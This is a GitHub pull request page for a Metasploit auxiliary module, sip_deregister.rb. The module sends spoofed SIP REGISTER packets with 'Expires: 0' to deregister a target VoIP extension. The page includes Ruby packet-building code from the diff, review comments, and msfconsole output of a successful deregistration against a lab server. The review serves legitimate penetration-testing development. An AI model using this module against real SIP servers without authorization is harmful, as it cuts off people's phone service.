Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

sip_deregister.rb #1032

Merged
merged 4 commits into from Nov 27, 2012

Conversation

Projects
None yet
2 participants
Contributor

ChrisJohnRiley commented Nov 7, 2012

Module to de-register SIP end-points (UDP)

Contributor

jvazquez-r7 commented Nov 8, 2012

Eyeballed, code looks good, fake test vs smartphone:

msf  auxiliary(sip_deregister) > rexploit
[*] Reloading module...
[*] Sending deregistration packet to: juan vazquez@localhost
[-] "juan vazquez" : Undefined error code 501
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7 jvazquez-r7 commented on the diff Nov 8, 2012

modules/auxiliary/voip/sip_deregister.rb
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::Udp
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SIP Deregister Extension',
+ 'Version' => '$Revision$',
@jvazquez-r7

jvazquez-r7 Nov 8, 2012

Contributor

not needed anymore

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 8, 2012

modules/auxiliary/voip/sip_deregister.rb
+ req << "From: \"#{ext}\"<sip:#{conn_string}>" + "\r\n"
+ req << "Call-ID: #{(rand(100)+100)}#{ip}" + "\r\n"
+ req << "CSeq: 1 REGISTER" + "\r\n"
+ req << "Contact: *" + "\r\n"
+ req << "Expires: 0" + "\r\n"
+ req << "Content-Length: 0" + "\r\n\r\n"
+
+ udp_sock.put(req)
+
+ while (r = udp_sock.recvfrom(65535, 3) and r[1])
+ parse_reply(r)
+ end
+
+ rescue Errno::EACCES
+ ensure
+ udp_sock.close if udp_sock
@jvazquez-r7

jvazquez-r7 Nov 8, 2012

Contributor

disconnect_udp will do it for you

Contributor

jvazquez-r7 commented Nov 8, 2012

msftidy complains

$ tools/msftidy.rb modules/auxiliary/voip/sip_deregister.rb 
sip_deregister.rb:68 - [WARNING] Spaces at EOL
sip_deregister.rb:86 - [WARNING] Spaces at EOL
Contributor

ChrisJohnRiley commented Nov 8, 2012

501 is an odd error message (not implemented). Did the de-register take
effect?

Perhaps you could email me a pcap so I can check?
On 8 Nov 2012 21:44, "Juan Vazquez" notifications@github.com wrote:

Eyeballed, code looks good, fake test vs smartphone:

msf auxiliary(sip_deregister) > rexploit
[*] Reloading module...

[] Sending deregistration packet to: juan vazquez@localhost
[-] "juan vazquez" : Undefined error code 501
[
] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Reply to this email directly or view it on GitHubhttps://github.com/rapid7/metasploit-framework/pull/1032#issuecomment-10204147.

Removed EOL spaces
Removed unrequired udp_sock.close
Contributor

jvazquez-r7 commented Nov 8, 2012

Dont worry, just a fast test versus a fake voip install, to check which the request is well generated and response is being parsed. And the SIP deregister packet looks good for me, so I'm going to merge, feel free to share pcap of it working if you would like, it always is helpful :)

Contributor

jvazquez-r7 commented Nov 8, 2012

Just a last question, is it always working for you, even when not using 5060 as src port?

thanks :)

Contributor

ChrisJohnRiley commented Nov 9, 2012

It worked for me as long as the criteria where met (I.e. SIP over UDP
enabled and extension using UDP as protocol).

The SRC port shouldn't be an issue really.

The 501 error from your tests was because you had a space in the extension
name (not supported).
On 8 Nov 2012 23:34, "Juan Vazquez" notifications@github.com wrote:

Just a last question, is it always working for you, even when not using
5060 as src port?

thanks :)


Reply to this email directly or view it on GitHubhttps://github.com/rapid7/metasploit-framework/pull/1032#issuecomment-10208013.

Added checks for Extension and Domain
Altered error handling on no response
Owner

ChrisJohnRiley commented on 6482de4 Nov 10, 2012

This should deal with the 501 error you saw
(spaces in the Extension or Domain are not supported in the RFC)

Contributor

jvazquez-r7 commented Nov 27, 2012

Tested successfully when the SIP provider doesn't require REGISTER / User auth, will update the description a little by myself before merging:

Output, with response output for my own debugging purposes :)

msf > use auxiliary/voip/sip_deregister 
msf  auxiliary(sip_deregister) > show options
Module options (auxiliary/voip/sip_deregister):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     example.com      yes       Use a specific SIP domain
   EXTENSION  100              yes       The specific extension or name to target
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   SRCADDR    192.168.1.1      yes       The sip address the spoofed call is coming from
   THREADS    1                yes       The number of concurrent threads
msf  auxiliary(sip_deregister) > set RHOSTS 192.168.1.147
RHOSTS => 192.168.1.147
msf  auxiliary(sip_deregister) > set DOMAIN 192.168.1.147
DOMAIN => 192.168.1.147
msf  auxiliary(sip_deregister) > set EXTENSION juan
EXTENSION => juan
msf  auxiliary(sip_deregister) > set SRCADDR 192.168.1.129
SRCADDR => 192.168.1.129
msf  auxiliary(sip_deregister) > show options
Module options (auxiliary/voip/sip_deregister):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     192.168.1.147    yes       Use a specific SIP domain
   EXTENSION  juan             yes       The specific extension or name to target
   RHOSTS     192.168.1.147    yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   SRCADDR    192.168.1.129    yes       The sip address the spoofed call is coming from
   THREADS    1                yes       The number of concurrent threads
msf  auxiliary(sip_deregister) > set CPORT 5060
CPORT => 5060
msf  auxiliary(sip_deregister) > run
[*] Sending deregistration packet to: juan@192.168.1.147
[*] res: SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.129
From: "juan"
To: "juan";tag=b65d1210as
Call-ID: 158192.168.1.147
CSeq: 1 REGISTER
Server: Brekeke SIP Server rev.333 Evaluation
Expires: 0
Date: Tue, 27 Nov 2012 17:22:51 GMT
Content-Length: 0
[+] "juan" de-registered [200 OK]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(sip_deregister) > 

@jvazquez-r7 jvazquez-r7 merged commit 6482de4 into rapid7:master Nov 27, 2012

1 check passed

default The Travis build passed
Details
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment